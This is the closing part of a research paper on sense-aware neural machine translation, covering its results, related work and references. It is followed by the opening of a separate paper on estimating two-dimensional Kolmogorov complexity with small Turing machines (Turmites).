of the EN/FR transla- tions of four word types. (a) Proportion of good (light gray), acceptable (middle gray), and wrong (dark gray) translations per word and system (baseline left, ATTini right, for each word). (b) Proportion of translations in which ATTini is better (light gray), equal (middle gray), or worse (dark gray) than the baseline. Firstly, Figure 1(a) shows that ATTini has a higher proportion of good translations, and a lower proportion of wrong ones, for all four words. The largest difference is for subject, where ATTini has 75% good translations and the baseline only 46%; moreover, the baseline has 22% errors and ATTini has only 9%. Secondly, Figure 1(b) shows the proportions of tokens, for each type, for which ATTini was respectively better, equal, or worse than the baseline. Again, for each of the four words, there are far more improvements brought by ATTini than degradations. On average, 40% of the occurrences are improved and only 10% are degraded. Results on WMT Data Sets. To demonstrate that our findings generalize to larger data sets, we report results on three data sets provided by the WMT conference (see §4), namely, for EN/DE, EN/ES and EN/FR. Tables 7 and 8 show the results of our proposed NMT models on these test sets. The results in Table 7 confirm that our sense-aware NMT models improve significantly the transla- tion quality also on larger data sets, which permit stronger baselines. Comparing these results with the ones from Table 5, we even conclude that our models trained on larger, mixed-domain data sets achieve higher improvements than the models trained on smaller, domain-specific data sets (Europarl). This clearly shows that our sense-aware NMT models are beneficial on both narrow and broad domains. Finally, we compare our model with several recent NMT models that make use of contex- tual information, thus sharing a similar overall goal to our study. Indeed, the model proposed by 644 EN/FR EN/ES NT12 NT13 NT12 NT13 Baseline 29.09 29.60 32.66 29.57 None + ATT 29.47 (+.38) 30.21 (+.61) † 33.15 (+.49) † 30.27 (+.70) ‡ k-means + ATTini 30.26 (+1.17) ‡ 30.95 (+.1.35) ‡ 34.14 (+1.48) ‡ 30.67 (+1.1) ‡ Table 7: BLEU scores on WMT NewsTest 2012 and 2013 (NT) test sets for two language pairs. Significance testing is indicated by † for p < 0.05 and ‡ for p < 0.01. NMT model NT14 NT15 Context-dependent (Choi et al., 2017) - 21.99 Context-aware (Zhang et al., 2017) 22.57 - Self-attentive (Werlen et al., 2018) 23.2 25.5 Baseline 22.79 24.94 None + ATT 23.34 † 25.28 k-means + ATTini 23.85 (+1.14) ‡ 25.71 (+0.77) ‡ Table 8: BLEU score on English-to-German translation over the WMT NewsTest (NT) 2014 and 2015 test sets. Significance testing is indicated by † for p < 0.05 and ‡ for p < 0.01. The highest score per column is in bold. Choi et al. (2017) attempts to improve NMT by integrating context vectors associated to source words into the generation process during decod- ing. The model proposed by Zhang et al. (2017) is aware of previous attended words on the source side in order to better predict which words will be attended in future. The self-attentive residual decoder designed by Werlen et al. (2018) lever- ages the contextual information from previously translated words on the target side. BLEU scores on the English–German pair shown in Table 8 demonstrate that our baseline is strong and that our model is competitive with respect to recent mod- els that leverage contextual information in differ- ent ways. 7 Related Work Word sense disambiguation aims to identify the sense of a word appearing in a given context (Agirre and Edmonds, 2007). Resolving word sense ambiguities should be useful, in particular, for lexical choice in MT. An initial investigation found that a statistical MT system that makes use of off-the-shelf WSD does not yield significantly better quality translations than an SMT system not using it (Carpuat and Wu, 2005). However, sev- eral studies (Cabezas and Resnik, 2005; Vickrey et al., 2005; Carpuat and Wu, 2007; Chan et al., 2007) reformulated the task of WSD for SMT and showed that integrating the ambiguity infor- mation generated from modified WSD improved SMT by 0.15–0.57 BLEU points compared with baselines. Recently, Tang et al. (2016) used only the super- senses from WordNet (coarse-grained semantic labels) for automatic WSD, using maximum en- tropy classification or sense embeddings learned using word2vec. When combining WSD with SMT using a factored model, Tang et al. improved BLEU scores by 0.7 points on average, though with large differences between their three test sub- sets (IT Q&A pairs). Although these reformulations of the WSD task proved helpful for SMT, they did not determine whether actual source-side senses are helpful or not for end-to-end SMT. Xiong and Zhang (2014) attempted to answer this question by performing self-learned word sense induction instead of us- ing pre-specified word senses as traditional WSD does. However, they created the risk of discover- ing sense clusters that do not correspond to the senses of words actually needed for MT. Hence, they left open an important question, namely, whether WSD based on semantic resources such as WordNet (Fellbaum, 1998) can be successfully integrated with SMT. Several studies integrated sense information as features to SMT, either obtained from the sense graph provided by WordNet (Neale et al., 2016) or generated from both sides of word dependen- cies (Su et al., 2015). However, apart from the sense graph, WordNet also provides textual infor- mation such as sense definitions and examples, which should be useful for WSD, but were not 645 used in these studies. In previous work (Pu et al., 2017), we used this information to perform sense induction on source-side data using k-means and demonstrated improvement with factored phrase- based SMT but not NMT. Neural MT became the state of the art (Sutskever et al., 2014; Bahdanau et al., 2015). Instead of working directly at the discrete sym- bol level as SMT, it projects and manipulates the source sequence of discrete symbols in a continu- ous vector space. However, NMT generates only one embedding for each word type, regardless of its possibly different senses, as analyzed, for example, by Hill et al. (2017). Several studies pro- posed efficient nonparametric models for mono- lingual word sense representation (Neelakantan et al., 2014; Li and Jurafsky, 2015; Bartunov et al., 2016; Liu et al., 2017), but left open the question whether sense representations can help neural MT by reducing word ambiguity. Recent studies integrate the additional sense assignment with neural MT based on these approaches, either by adding such sense assignments as additional features (Rios et al., 2017) or by merging the con- text information on both sides of parallel data for encoding and decoding (Choi et al., 2017). Yang et al. (2017) recently proposed to add sense information by using weighted sense em- beddings as input to neural MT. The sense labels were generated by a MSSG model (Neelakantan et al., 2014), and the context vector used for sense weight generation was computed from the out- put of a bidirectional RNN. Finally, the weighted average sense embeddings were used in place of the word embedding for the NMT encoder. The numerical results given in §6 show that our options for using sense embeddings outper- form Yang et al.’s proposal. In fact, their ap- proach even performed worse than the NMT baseline on our EN/FR data set. We conclude that adaptive k-means clustering is better than MSSG for use in NMT, and that concatenating the word embedding and its sense vector as input for the RNN encoder is better than just using the sense embedding for each token. In terms of efficiency, Yang et al. (2017) need an additional bidirectional RNN to generate the context vector for each input token, whereas we compute the context vector by averaging the embeddings of the neighboring to- kens. This slows down the training of the encoder by a factor of 3, which may explain why they only trained their model for six epochs. 8 Conclusion We presented a neural MT system enhanced with an attention-based method to represent multi- ple word senses, making use of a larger con- text to disambiguate words that have various possible translations. We proposed several adap- tive context-dependent clustering algorithms for WSD and combined them in several ways with NMT—following our earlier experiments with SMT (Pu et al., 2017)—and found that they had competitive WSD performance on data from the SemEval 2010 shared task. For NMT, the best-performing method used the output of k-means to initialize the sense embed- dings that are learned by our system. In partic- ular, it appeared that learning sense embeddings for NMT is better than using embeddings learned separately by other methods, although such em- beddings may be useful for initialization. Our ex- periments with five language pairs showed that our sense-aware NMT systems consistently improve over strong NMT baselines, and that they specifi- cally improve the translation of words with multi- ple senses. In the future, our approach to sense-aware NMT could be extended to other NMT architec- tures such as the Transformer network proposed by Vaswani et al. (2017). As was the case with the LSTM-based architecture studied here, the Transformer network does not explicitly model or utilize the sense information of words, and, therefore, we hypothesize that its performance could also be improved by using our sense in- tegration approaches. To encourage further re- search in sense-aware NMT, our code is made available at https://github.com/idiap/ sense_aware_NMT. Acknowledgments The authors are grateful for support from the Swiss National Science Foundation through the MODERN Sinergia project on Modeling Dis- course Entities and Relations for Coherent Machine Translation, grant no. 147653 (www. idiap.ch/project/modern), and from the European Union through the SUMMA Hori- zon 2020 project on Scalable Understanding of Multilingual Media, grant no. 688139 (www. summa-project.eu). The authors would like to thank the TACL editors and reviewers for their helpful comments and suggestions. 646 https://github.com/idiap/sense_aware_NMT https://github.com/idiap/sense_aware_NMT www.idiap.ch/project/modern www.idiap.ch/project/modern www.summa-project.eu www.summa-project.eu References Eneko Agirre and Philip Edmonds. 2007. Word Sense Disambiguation: Algorithms and Appli- cations. Springer-Verlag, Berlin, Germany. Eneko Agirre, Oier López de Lacalle, and Aitor Soroa. 2014. Random walks for knowledge- based word sense disambiguation. Computa- tional Linguistics, 40(1):57–84. Eneko Agirre and Aitor Soroa. 2009. Personaliz- ing PageRank for word sense disambiguation. In Proceedings of the 12th Conference of the European Chapter of the Association for Com- putational Linguistics (EACL), pages 33–41, Athens, Greece. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In Pro- ceedings of the International Conference on Learning Representations, San Diego, CA, USA. Sergey Bartunov, Dmitry Kondrashkin, Anton Osokin, and Dmitry Vetrov. 2016. Breaking sticks and ambiguities with adaptive skip- gram. In Artificial Intelligence and Statistics, pages 130–138. Ondřej Bojar, Christian Buck, Christian Federmann, Barry Haddow, Philipp Koehn, Johannes Leveling, Christof Monz, Pavel Pecina, Matt Post, Herve Saint-Amand, Radu Soricut, Lucia Specia, and Aleš Tamchyna. 2014. Findings of the 2014 workshop on statis- tical machine translation. In Proceedings of the Ninth Workshop on Statistical Machine Trans- lation, pages 12–58, Baltimore, Maryland, USA. Ondřej Bojar, Rajen Chatterjee, Christian Federmann, Yvette Graham, Barry Haddow, Matthias Huck, Antonio Jimeno Yepes, Philipp Koehn, Varvara Logacheva, Christof Monz, Matteo Negri, Aurelie Neveol, Mariana Neves, Martin Popel, Matt Post, Raphael Rubino, Carolina Scarton, Lucia Specia, Marco Turchi, Karin Verspoor, and Marcos Zampieri. 2016. Findings of the 2016 conference on machine translation. In Pro- ceedings of the First Conference on Machine Translation, pages 131–198, Berlin, Germany. Clara Cabezas and Philip Resnik. 2005. Using WSD techniques for lexical selection in sta- tistical machine translation. Technical report, DTIC Document. Marine Carpuat and Dekai Wu. 2005. Word sense disambiguation vs. statistical machine translation. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics, pages 387–394, Michigan, MI, USA. Marine Carpuat and Dekai Wu. 2007. Improv- ing statistical machine translation using word sense disambiguation. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Compu- tational Natural Language Learning (EMNLP- CoNLL), pages 61–72, Prague, Czech Republic. Mauro Cettolo, Christian Girardi, and Marcello Federico. 2012. WIT3: Web inventory of transcribed and translated talks. In Proceed- ings of the 16th Conference of the European Association for Machine Translation (EAMT), pages 261–268, Trento, Italy. Yee Seng Chan, Hwee Tou Ng, and David Chiang. 2007. Word sense disambiguation im- proves statistical machine translation. In Pro- ceedings of the 45th Annual Meeting of the Association for Computational Linguistics, pages 33–40, Prague, Czech Republic. Heeyoul Choi, Kyunghyun Cho, and Yoshua Bengio. 2017. Context-dependent word repre- sentation for neural machine translation. Com- puter Speech & Language, 45:149–160. Christiane Fellbaum, editor. 1998. WordNet: An Electronic Lexical Database. The MIT Press, Cambridge, MA, USA. Thomas S. Ferguson. 1973. A Bayesian analysis of some nonparametric problems. The Annals of Statistics, 1(2):209–230. Sergey Grin and Lawrence Page. 1998. The anatomy of a large-scale hypertextual Web search engine. Computer Networks and ISDN Systems, 30(1-7):107–117. Felix Hill, Kyunghyun Cho, Sébastien Jean, and Yoshua Bengio. 2017. The representational ge- ometry of word meanings acquired by neural machine translation models. Machine Transla- tion, 31(1):3–18. 647 Roman Kern, Markus Muhr, and Michael Granitzer. 2010. KCDC: Word sense induction by us- ing grammatical dependencies and sentence phrase structure. In Proceedings of the 5th In- ternational Workshop on Semantic Evaluation (SemEval-2010), pages 351–354, Los Angeles, CA, USA. Guillaume Klein, Yoon Kim, Yuntian Deng, Jean Senellart, and Alexander M. Rush. 2017. Open- NMT: Open-source toolkit for neural machine translation. CoRR, abs/1701.02810v2. Philipp Koehn. 2005. Europarl: A parallel cor- pus for statistical machine translation. In Pro- ceedings of MT Summit X, pages 79–86, Phuket, Thailand. Ioannis Korkontzelos and Suresh Manandhar. 2010. UoY: graphs of ambiguous vertices for word sense induction and disambiguation. In Proceedings of the 5th International Work- shop on Semantic Evaluation (SemEval 2010), pages 355–358, Los Angeles, California. Jiwei Li and Dan Jurafsky. 2015. Do multi-sense embeddings improve natural language under- standing? In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1722–1732, Lisbon, Portugal. Frederick Liu, Han Lu, and Graham Neubig. 2017. Handling homographs in neural machine trans- lation. CoRR, abs/1708.06510v2. Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention-based neural machine translation. In Proceedings of the 2015 Conference on Empir- ical Methods in Natural Language Processing (EMNLP), pages 1412–1421, Lisbon, Portugal. James MacQueen. 1967. Some methods for clas- sification and analysis of multivariate obser- vations. In Proceedings of the 5th Berkeley Symposium on Mathematical Statistics and Probability, pages 281–297. Oakland, CA, USA. Suresh Manandhar, Ioannis P. Klapaftis, Dmitriy Dligach, and Sameer S. Pradhan. 2010. SemEval-2010 task 14: Word sense induction and disambiguation. In Proceedings of the 5th International Workshop on Semantic Evaluation (SemEval 2010), pages 63–68, Los Angeles, CA, USA. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Corrado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In Advances in Neu- ral Information Processing Systems (NIPS), pages 3111–3119. Andrea Moro and Roberto Navigli. 2015. Semeval-2015 task 13: Multilingual all-words sense disambiguation and entity linking. In Proceedings of the 9th International Workshop on Semantic Evaluation (SemEval 2015), pages 288–297, Denver, Colorado. Association for Computational Linguistics. Steven Neale, Luıs Gomes, Eneko Agirre, Oier Lopez de Lacalle, and António Branco. 2016. Word sense-aware machine translation: Including senses as contextual features for im- proved translation models. In Proceedings of the 10th International Conference on Lan- guage Resources and Evaluation (LREC 2016), pages 2777–2783, Portoroz, Slovenia. Arvind Neelakantan, Jeevan Shankar, Alexandre Passos, and Andrew McCallum. 2014. Efficient non-parametric estimation of multiple embed- dings per word in vector space. In Proceedings of the 2014 Conference on Empirical Meth- ods in Natural Language Processing (EMNLP), pages 1059–1069, Doha, Qatar. Kishore Papineni, Salim Roukos, Todd Ward, and Wei-Jing Zhu. 2002. BLEU: A method for automatic evaluation of machine transla- tion. In Proceedings of the 40th Annual Meeting of Association for Computational Linguistics, pages 311–318, Philadelphia, USA. Ted Pedersen. 2010. Duluth-WSI: SenseClusters applied to the sense induction task of SemEval- 2. In Proceedings of the 5th International Work- shop on Semantic Evaluation (SemEval 2010), pages 363–366, Los Angeles, CA, USA. Fabian Pedregosa, Gaël Varoquaux, Alexandre Gramfort, Vincent Michel, Bertrand Thirion, Olivier Grisel, Mathieu Blondel, Peter Prettenhofer, Ron Weiss, Vincent Dubourg, Jake Vanderplas, Alexandre Passos, David 648 http://www.aclweb.org/anthology/S15-2049 http://www.aclweb.org/anthology/S15-2049 Cournapeau, Matthieu Brucher, Matthieu Perrot, and Édouard Duchesnay. 2011. Scikit- learn: Machine learning in Pmaython. Journal of Machine Learning Research, 12:2825–2830. Xiao Pu, Nikolaos Pappas, and Andrei Popescu- Belis. 2017. Sense-aware statistical machine translation using adaptive context-dependent clustering. In Proceedings of the Second Con- ference on Machine Translation, pages 1–10, Copenhagen, Denmark. Alexandre Rafalovitch and Robert Dale. 2009. United Nations general assembly resolutions: A six-language parallel corpus. In Proceedings of MT Summit XII, pages 292–299, Ontario, ON. Canada. Annette Rios, Laura Mascarell, and Rico Sennrich. 2017. Improving word sense dis- ambiguation in neural machine translation with sense embeddings. In Second Confer- ence on Machine Translation, pages 11–19, Copenhagen, Denmark. Jinsong Su, Deyi Xiong, Shujian Huang, Xianpei Han, and Junfeng Yao. 2015. Graph-based col- lective lexical selection for statistical machine translation. In Proceedings of the Conference on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 1238–1247, Lisbon, Portugal. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Sequence to sequence learning with neural networks. In Advances in Neural Information Processing Systems (NIPS), pages 3104–3112. Haiqing Tang, Deyi Xiong, Oier Lopez de Lacalle, and Eneko Agirre. 2016. Improv- ing translation selection with supersenses. In Proceedings of the 26th International Confer- ence on Computational Linguistics (COLING), pages 3114–3123, Osaka, Japan. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Łukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information Processing Systems, pages 5998–6008. David Vickrey, Luke Biewald, Marc Teyssier, and Daphne Koller. 2005. Word-sense disambigua- tion for machine translation. In Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Processing (HLT-EMNLP), pages 771–778, Vancouver, BC, Canada. Lesly Miculicich Werlen, Nikolaos Pappas, Dhananjay Ram, and Andrei Popescu-Belis. 2018. Self-attentive residual decoder for neural machine translation. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT), pages 1366–1379, New Orleans, LA, USA. Deyi Xiong and Min Zhang. 2014. A sense- based translation model for statistical machine translation. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics, pages 1459–1469, Baltimore MD, USA. Zhen Yang, Wei Chen, Feng Wang, and Bo Xu. 2017. Multi-sense based neural machine trans- lation. In International Joint Conference on Neural Networks, pages 3491–3497, Anchorage, AK, USA. Biao Zhang, Deyi Xiong, Jinsong Su, and Hong Duan. 2017. A context-aware recurrent encoder for neural machine translation. IEEE/ACM Transactions on Audio, Speech and Language Processing (TASLP), pages 2424–2432. 649 work_z6a2e7o6xneifhhzpx4u5zutgi ---- Two-dimensional Kolmogorov complexity and an empirical validation of the Coding theorem method by compressibility Submitted 26 May 2015 Accepted 1 September 2015 Published 30 September 2015 Corresponding author Hector Zenil, hectorz@labores.eu Academic editor Mikael Skoglund Additional Information and Declarations can be found on page 29 DOI 10.7717/peerj-cs.23 Copyright 2015 Zenil et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Two-dimensional Kolmogorov complexity and an empirical validation of the Coding theorem method by compressibility Hector Zenil1 ,2 ,6, Fernando Soler-Toscano3 ,6, Jean-Paul Delahaye4 ,6 and Nicolas Gauvrit5 ,6 1 Unit of Computational Medicine, Department of Medicine Solna, SciLifeLab (Science for Life Laboratory), Centre for Molecular Medicine and Karolinska Institute, Stockholm, Sweden 2 Department of Computer Science, University of Oxford, UK 3 Grupo de Lógica, Lenguaje e Información, Universidad de Sevilla, Spain 4 CRISTAL (Centre de recherche en informatique, signal et automatique de Lille), France 5 CHArt Lab, École Pratique des Hautes Etudes, Paris, France 6 Algorithmic Nature Group, LABoRES, Paris, France ABSTRACT We propose a measure based upon the fundamental theoretical concept in algorithmic information theory that provides a natural approach to the problem of evaluating n-dimensional complexity by using an n-dimensional deterministic Turing machine. The technique is interesting because it provides a natural algorith- mic process for symmetry breaking generating complex n-dimensional structures from perfectly symmetric and fully deterministic computational rules producing a distribution of patterns as described by algorithmic probability. Algorithmic probability also elegantly connects the frequency of occurrence of a pattern with its algorithmic complexity, hence effectively providing estimations to the complexity of the generated patterns. Experiments to validate estimations of algorithmic complexity based on these concepts are presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with the results obtained using lossless compression algorithms when both methods overlap in their range of applicability. We then use the output frequency of the set of 2-dimensional Turing machines to classify the algorithmic complexity of the space-time evolutions of Elementary Cellular Automata. Subjects Computational Biology, Artificial Intelligence, Theory and Formal Methods Keywords Algorithmic complexity, Algorithmic probability, Kolmogorov–Chaitin complexity, Algorithmic information theory, Cellular automata, Solomonoff–Levin universal distribution, Information theory, Dimensional complexity, Image complexity, Small Turing machines INTRODUCTION The question of natural measures of complexity for objects other than strings and sequences, in particular suited for 2-dimensional objects, is an open important problem in complexity science and with potential applications to molecule folding, cell distribution, artificial life and robotics. Here we provide a measure based upon the fundamental How to cite this article Zenil et al. (2015), Two-dimensional Kolmogorov complexity and an empirical validation of the Coding theorem method by compressibility. PeerJ Comput. Sci. 1:e23; DOI 10.7717/peerj-cs.23 mailto:hectorz@labores.eu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.23 http://dx.doi.org/10.7717/peerj-cs.23 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 theoretical concept that provides a natural approach to the problem of evaluating n-dimensional algorithmic complexity by using an n-dimensional deterministic Turing machine, popularized under the term of Turmites for n = 2, from which the so-called Langton’s ant is an example of a Turing universal Turmite. A series of experiments to validate estimations of Kolmogorov complexity based on these concepts is presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with the results obtained using lossless compression algo- rithms when both methods overlap in their range of applicability. We also present a divide and conquer algorithm that we call Block Decomposition Method (BDM) application to classification of images and space–time evolutions of discrete systems, providing evidence of the soundness of the method as a complementary alternative to compression algorithms for the evaluation of algorithmic complexity. We provide exact numerical approximations of Kolmogorov complexity of square image patches of size 3 and more, with the BDM allowing scalability to larger 2-dimensional arrays and even greater dimensions. The challenge of finding and defining 2-dimensional complexity measures has been identified as an open problem of foundational character in complexity science (Feldman & Crutchfield, 2003; Shalizi, Shalizi & Haslinger, 2004). Indeed, for example, humans understand 2-dimensional patterns in a way that seems fundamentally different than 1-dimensional (Feldman, 2008). These measures are important because current 1-dimensional measures may not be suitable to 2-dimensional patterns for tasks such as quantitatively measuring the spatial structure of self-organizing systems. On the one hand, the application of Shannon’s Entropy and Kolmogorov complexity has traditionally been designed for strings and sequences. However, n-dimensional objects may have structure only distinguishable in their natural dimension and not in lower dimensions. This is indeed a question related to the loss of information in dimension reductionality (Zenil, Kiani & Tegnér, in press). A few measures of 2-dimensional complexity have been proposed before building upon Shannon’s entropy and block entropy (Feldman & Crutchfield, 2003; Andrienko, Brilliantov & Kurths, 2000), mutual information and minimal sufficient statistics (Shalizi, Shalizi & Haslinger, 2004) and in the context of anatomical brain MRI analysis (Young et al., 2009; Young & Schuff, 2008). A more recent application, also in the medical context related to a measure of consciousness, was proposed using lossless compressibility for EGG brain image analysis was proposed in Casali et al. (2013). On the other hand, for Kolmogorov complexity, the common approach to evaluating the algorithmic complexity of a string has been by using lossless compression algorithms because the length of lossless compression is an upper bound of Kolmogorov complexity. Short strings, however, are difficult to compress in practice, and the theory does not pro- vide a satisfactory solution to the problem of the instability of the measure for short strings. Here we use so-called Turmites (2-dimensional Turing machines) to estimate the Kolmogorov complexity of images, in particular space–time diagrams of cellular automata, using Levin’s Coding theorem from algorithmic probability theory. We study the problem of the rate of convergence by comparing approximations to a universal distribution using different (and larger) sets of small Turing machines and comparing the results to Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 2/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 that of lossless compression algorithms carefully devising tests at the intersection of the application of compression and algorithmic probability. We found that strings which are more random according to algorithmic probability also turn out to be less compressible, while less random strings are clearly more compressible. Compression algorithms have proven to be signally applicable in several domains (see e.g., Li & Vitányi, 2009), yielding surprising results as a method for approximating Kolmogorov complexity. Hence their success is in part a matter of their usefulness. Here we show that an alternative (and complementary) method yields compatible results with the results of lossless compression. For this we devised an artful technique by grouping strings that our method indicated had the same program-size complexity, in order to construct files of concatenated strings of the same complexity (while avoiding repetition, which could easily be exploited by compression). Then a lossless general compression algorithm was used to compress the files and ascertain whether the files that were more compressed were the ones created with highly complex strings according to our method. Similarly, files with low Kolmogorov complexity were tested to determine whether they were better com- pressed. This was indeed the case, and we report these results in ‘Validation of the Coding Theorem Method by Compressibility’. In ‘Comparison of Km and compression of cellular automata’ we also show that the Coding theorem method yields a very similar classification of the space–time diagrams of Elementary Cellular Automata, despite the disadvantage of having used a limited sample of a Universal Distribution. In all cases the statistical evidence is strong enough to suggest that the Coding theorem method is sound and capable of producing satisfactory results. The Coding theorem method also represents the only currently available method for dealing with very short strings and in a sense is an expensive but powerful “microscope” for capturing the information content of very small objects. KOLMOGOROV–CHAITIN COMPLEXITY Central to algorithmic information theory (AIT) is the definition of algorithmic (Kolmogorov–Chaitin or program-size) complexity (Kolmogorov, 1965; Chaitin, 1969): KT (s) = min{|p|,T(p) = s}. (1) That is, the length of the shortest program p that outputs the string s running on a universal Turing machine T. A classic example is a string composed of an alternation of bits, such as (01)n, which can be described as “n repetitions of 01”. This repetitive string can grow fast while its description will only grow by about log2(n). On the other hand, a random-looking string such as 011001011010110101 may not have a much shorter description than itself. Uncomputability and instability of K A technical inconvenience of K as a function taking s to the length of the shortest program that produces s is its uncomputability (Chaitin, 1969). In other words, there is no program which takes a string s as input and produces the integer K(s) as output. This is usually considered a major problem, but one ought to expect a universal measure of complexity Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 3/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 to have such a property. On the other hand, K is more precisely upper semi-computable, meaning that one can find upper bounds, as we will do by applying a technique based on another semi-computable measure to be presented in the ‘Solomonoff–Levin Algorithmic Probability’. The invariance theorem guarantees that complexity values will only diverge by a constant c (e.g., the length of a compiler, a translation program between U1 and U2) and that they will converge at the limit. Invariance Theorem (Calude, 2002; Li & Vitányi, 2009): If U1 and U2 are two universal Turing machines and KU1 (s) and KU2 (s) the algorithmic complexity of s for U1 and U2, there exists a constant c such that for all s: |KU1 (s) − KU2 (s)| < c. (2) Hence the longer the string, the less important c is (i.e., the choice of programming language or universal Turing machine). However, in practice c can be arbitrarily large because the invariance theorem tells nothing about the rate of convergence between KU1 and KU2 for a string s of increasing length, thus having an important impact on short strings. SOLOMONOFF–LEVIN ALGORITHMIC PROBABILITY The algorithmic probability (also known as Levin’s semi-measure) of a string s is a measure that describes the expected probability of a random program p running on a universal (prefix-free1) Turing machine T producing s upon halting. Formally (Solomonoff, 1964; 1 The group of valid programs forms a prefix-free set (no element is a prefix of any other, a property necessary to keep 0 < m(s) < 1). For details see Calude (2002). Levin, 1974; Chaitin, 1969), m(s) =  p:T(p)=s 1/2|p|. (3) Levin’s semi-measure2 m(s) defines a distribution known as the Universal Distribution 2 It is called a semi measure because the sum is never 1, unlike probability measures. This is due to the Turing machines that never halt. (a beautiful introduction is given in Kircher, Li & Vitanyi (1997)). It is important to notice that the value of m(s) is dominated by the length of the smallest program p (when the denominator is larger). However, the length of the smallest p that produces the string s is K(s). The semi-measure m(s) is therefore also uncomputable, because for every s, m(s) requires the calculation of 2−K(s), involving K , which is itself uncomputable. An alternative to the traditional use of compression algorithms is the use of the concept of algorithmic probability to calculate K(s) by means of the following theorem. Coding Theorem (Levin, 1974): |−log2m(s) − K(s)| < c. (4) This means that if a string has many descriptions it also has a short one. It beautifully connects frequency to complexity, more specifically the frequency of occurrence of a string with its algorithmic (Kolmogorov) complexity. The Coding theorem implies that (Cover & Thomas, 2006; Calude, 2002) one can calculate the Kolmogorov complexity of a string from Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 4/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 its frequency (Delahaye & Zenil, 2007b; Delahaye & Zenil, 2007a; Zenil, 2011; Delahaye & Zenil, 2012), simply rewriting the formula as: Km(s) = −log2m(s) + O(1). (5) An important property of m as a semi-measure is that it dominates any other effective semi-measure µ, because there is a constant cµ such that for all s, m(s) ≥ cµµ(s). For this reason m(s) is often called a Universal Distribution (Kircher, Li & Vitanyi, 1997). THE CODING THEOREM METHOD Let D(n,m) be a function (Delahaye & Zenil, 2012) defined as follows: D(n,m)(s) = |{T ∈ (n,m) : T produces s}| |{T ∈ (n,m) : T halts }| (6) where (n,m) denotes the set of Turing machines with n states and m symbols, running with empty input, and |A| is, in this case, the cardinality of the set A. In Zenil (2011) and Delahaye & Zenil (2012) we calculated the output distribution of Turing machines with 2-symbols and n = 1,...,4 states for which the Busy Beaver (Radó, 1962) values are known, in order to determine the halting time, and in Soler-Toscano et al. (2014) results were improved in terms of number and Turing machine size (5 states) and in the way in which an alternative to the Busy Beaver information was proposed, hence no longer needing exact information of halting times in order to approximate an informative distribution. Here we consider an experiment with 2-dimensional deterministic Turing machines (also called Turmites) in order to estimate the Kolmogorov complexity of 2-dimensional objects, such as images that can represent space–time diagrams of simple systems. A Turmite is a Turing machine which has an orientation and operates on a grid for “tape”. The machine can move in 4 directions rather than in the traditional left and right movements of a traditional Turing machine head. A reference to this kind of investigation and definition of 2D Turing machines can be found in Wolfram (2002), one popular and possibly one of the first examples of this variation of a Turing machine is Lagton’s ant (Langton, 1986) also proven to be capable of Turing-universal computation. In ‘Comparison of Km and approaches based on compression’, we will use the so-called Turmites to provide evidence that Kolmogorov complexity evaluated through algorithmic probability is consistent with the other (and today only) method for approximating K , namely lossless compression algorithms. We will do this in an artful way, given that compression algorithms are unable to compress strings that are too short, which are the strings covered by our method. This will involve concatenating strings for which our method establishes a Kolmogorov complexity, which then are given to a lossless compression algorithm in order to determine whether it provides consistent estimations, that is, to determine whether strings are less compressible where our method says that they have greater Kolmogorov complexity and whether strings are more compressible where our method says they have lower Kolmogorov complexity. We provide evidence that this is actually the case. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 5/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 In ‘Comparison of Km and compression of cellular automata’ we will apply the results from the Coding theorem method to approximate the Kolmogorov complexity of 2-dimensional evolutions of 1-dimensional, closest neighbor Cellular Automata as defined in Wolfram (2002), and by way of offering a contrast to the approximation provided by a general lossless compression algorithm (Deflate). As we will see, in all these experiments we provide evidence that the method is just as successful as compression algorithms, but unlike the latter, it can deal with short strings. Deterministic 2-dimensional Turing machines (Turmites) Turmites or 2-dimensional (2D) Turing machines run not on a 1-dimensional tape but in a 2-dimensional unbounded grid or array. At each step they can move in four different directions (up, down, left, right) or stop. Transitions have the format {n1,m1} → {n2,m2,d}, meaning that when the machine is in state n1 and reads symbols m1, it writes m2, changes to state n2 and moves to a contiguous cell following direction d. If n2 is the halting state then d is stop. In other cases, d can be any of the other four directions. Let (n,m)2D be the set of Turing machines with n states and m symbols. These machines have nm entries in the transition table, and for each entry {n1,m1} there are 4nm + m possible instructions, that is, m different halting instructions (writing one of the different symbols) and 4nm non-halting instructions (4 directions, n states and m different symbols). So the number of machines in (n,m)2D is (4nm + m) nm. It is possible to enumerate all these machines in the same way as 1D Turing machines (e.g., as has been done in Wolfram (2002) and Joosten (2012)). We can assign one number to each entry in the transition table. These numbers go from 0 to 4nm + m − 1 (given that there are 4nm + 